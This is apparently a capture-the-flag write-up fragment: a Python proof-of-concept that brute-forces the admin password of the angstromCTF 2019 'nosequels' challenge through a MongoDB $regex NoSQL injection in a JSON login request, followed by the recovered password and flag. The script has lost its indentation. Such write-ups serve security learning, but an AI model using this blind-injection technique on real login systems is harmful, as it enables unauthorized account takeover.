poc:
```
#coding:utf-8
import requests
import string
url = "https://nosequels.2019.chall.actf.co/login"
data = """{{"username":"admin","password":{{"$regex":"^{0}"}}}}"""
str_all = string.letters + string.digits
header = {
"Content-Type": "application/json",
"Cookie": "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRoZW50aWNhdGVkIjpmYWxzZSwiaWF0IjoxNTU1NzU2NDgzfQ.Yc16r6Kc3eEIhB2bDLwEy1HtJ9aYQZCNd55ykg7Zxbw"
}

password = ""
for i in range(15):
print password
for c in str_all:
res = requests.post(url, data = data.format(password + c), headers=header)
if "actf" in res.text:
password = password + c
break
```
```
password: congratsyouwin
flag: actf{still_no_sql_in_the_sequel}
```